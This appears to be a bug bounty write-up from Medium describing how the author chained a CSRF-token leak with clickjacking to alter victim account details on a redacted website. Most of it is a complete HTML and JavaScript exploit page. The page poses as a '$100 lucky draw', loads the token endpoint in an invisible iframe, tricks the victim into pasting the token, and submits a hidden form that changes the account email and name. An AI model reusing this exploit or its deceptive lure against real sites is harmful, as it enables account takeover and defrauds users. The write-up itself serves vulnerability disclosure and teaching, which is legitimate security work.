Bypass CSRF With ClickJacking Worth $1250

Saad Ahmed

Hello friends, I hope you all are doing well, so this write up is all about how I chain the two different vulnerabilities to update the victim account details. Let assume the website name redacted.com

So when I visit the profile page https://redacted.com/editinfo/& try to change the account details there is CSRF token I try many methods to bypass this CSRF protection but failed no thing happened, but then I found the suspicious endpoint that disclosing the CSRF token https://redacted.com/accountinfo/personal/lpsust/v1/redacted.com/

So when I open that endpoint I found the CSRF token in the response, Now the next part is stealing the CSRF token & then I find out that there is no protection from the click jacking I created a HTML + JS Script to exploit the CSRF in just 1 Click

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>

<center><h1 style=”color: blue; text-decoration: underline;”>Lucky Draw to Win a $100</h1></center>

<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>

<div style=”border: 2px solid gray;”>
<iframe src=”https://redacted.com/accountinfo/personal/lpsust/v1/redacted.com/" width=”100%” style=”opacity: 0"></iframe>

</div>

<h3>Click inside the box and press CTRL+V</h3>
<input type=”password” name=”” size=”1">

<br>
<button id=”btn”>Click to Win</button>

<div style=”display: none;”>
<form action=”” method=”POST”>
<input type=”hidden” name=”addrid” value=”12741305" />
<input type=”hidden” name=”uname” value=”hack@gmail.com” />
<input type=”hidden” name=”issendmsg” value=”1" />
<input type=”hidden” name=”display” value=”” />
<input type=”hidden” name=”sendtype” value=”update” />
<input type=”hidden” name=”firstname” value=”accountinfo” />
<input type=”hidden” name=”lastname” value=”HACKED” />
<input type=”hidden” name=”country” value=”US” />
<input type=”hidden” name=”reglang” value=”en&#95;US” />
<input type=”hidden” name=”postcode” value=”1337" />
<input type=”submit” value=”Submit request” />
</form>
</div>

</body>

<script>
document.querySelector(“#btn”).onclick = function() {
var token = document.querySelector(“input”).value
var form = document.querySelector(“form”)

token = JSON.parse(token)
var mapInput = document.createElement(“input”);
mapInput.type = “hidden”;
mapInput.name = “auth_token”;
mapInput.value = token.Value;

form.appendChild(mapInput)

form.action = `https://redacted.com/editInfo`
form.submit();
alert(“Congratulation! You have won $100”)
}
</script>

</html>

So when the victim paste the api response in the field & click on CLICK TO WIN the js code append input filed in the form with the CSRF token that get from victim & made request to update the account details & Boom it worked. I hope you like it

./LOGOUT

Saad Ahmed

Written by

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade